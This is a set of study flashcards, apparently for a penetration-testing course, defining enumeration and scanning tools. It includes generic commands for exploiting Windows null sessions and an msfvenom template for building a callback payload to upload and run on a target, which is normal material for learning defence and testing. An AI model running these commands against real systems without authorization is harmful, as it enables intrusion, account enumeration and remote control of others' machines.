Enumeration tools Flashcards
nbtscan
scans a network for Windows or Samba servers on a subnet. It displays IP address, server name, and MAC address.
snmpcheck
displays all the information available for a given community on a specified IP address.
Metasploit
general-purpose framework that uses predefined scripts for launching several different types of discovery.
Ikeforce
Python script that can be used on a network to provide information about potential VPN servers.
Dnscat
Ruby program that tunnels data over DNS to avoid firewalls.
John the Ripper
s a password-cracking tool. Using other tools, usernames can be enumerated and then JTR can be used to crack the password.
ad-ldap-enum
Python script used to enumerate a Windows Active Directory domain.
finger
Provides information about a user. You can enter:
finger –s username to obtain the specified user’s login name, real name, terminal name, write status, idle time, login time, office location, and office phone number.
finger –s to obtain the same information as finger -s username about all users on a system.
finger –l user@host to obtain information about all users on a remote system.
NULL session
Is created when no credentials are used to connect to a Windows system.
A null session is designed to allow clients access to limited types of information across a network.
A null session can be exploited to find information about users, groups, machines, shares, and host SIDs.
A hacker can enter:
net use //hostname/ipc$ \ hostname\ipc$ /user: username to connect to a system.
net view \ hostname to display shares available on a system.
s: \ hostname\ shared folder name to connect to and view one of these shares.
PsTools
Is a suite of very powerful tools that allow you to manage local and remote Windows systems.
The package includes tools that can change account passwords, suspend processes, measure network performance, dump event log records, kill processes, or view and control services.
SuperScan
Is used to enumerate information from a Windows host. Information gathered can include NetBIOS name table, services, NULL session, trusted domains, MAC addresses, logon sessions, workstation type, account policies, users, and groups.
Metasploit Framework
Is a tool for developing and executing exploit code against a remote target machine. It is part of the Metasploit Project. It can:
Check whether a targeted system can be exploited.
Allow selection of specific exploit code to be used.
Compile exploited code into the target system’s native executable type as a payload and exploit the system.
Exploit payloads are generated with the command:
msfvenom -p payload_type LHOST= ip_or_hostname_of_controlling_host LPORT= port_on_controlling_host -f executable_format -o output_filename
The output file is then uploaded to the target system and executed. The command msfconsole is used to start the console, where commands can be issued to a target host.
OpenVAS
scanners is an open-source software developed from the Nessus codebase
Qualys Vulnerability Management assessment tool
It is a cloud-based service that keeps all your data in a private virtual database.
SecurityMetrics Mobile
detects vulnerabilities on mobile devices and gives you a report containing a total risk score, a summary of revealed vulnerabilities, and remediation suggestions
Burp Suite
web application scanner looks for common vulnerabilities, like cross-site scripting and SQL injections, and also scans for the OWASP Top 10
Nikto
scans web servers and version-specific vulnerabilities
OWASP ZAP
web application scanner that is extensible and that evaluates each web application individually
Qualys
web-based scanner for your enterprise-level employer. It’s imperative that the data be encrypted while in motion and at rest and that only the scanner workers reside on-premises
